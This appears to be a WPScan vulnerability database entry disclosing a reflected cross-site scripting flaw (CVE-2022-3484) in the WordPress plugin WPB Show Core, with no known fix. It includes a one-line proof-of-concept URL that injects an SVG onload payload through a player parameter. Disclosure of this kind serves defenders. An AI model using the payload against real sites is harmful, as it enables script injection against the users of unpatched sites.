WordPress Plugin Vulnerabilities

WPB Show Core - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]="><svg+onload%3Dconfirm(1)>

Affects Plugins

wpb-show-core

No known fix

References

CVE

CVE-2022-3484

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Abdulali AlDurazi

Submitter

Abdulali AlDurazi

Verified

Yes

WPVDB ID

3afaed61-6187-4915-acf0-16e79d5c2464

Timeline

Publicly Published

2022-10-13 (about 3 months ago)

Added

2022-10-13 (about 3 months ago)

Last Updated

2022-10-13 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin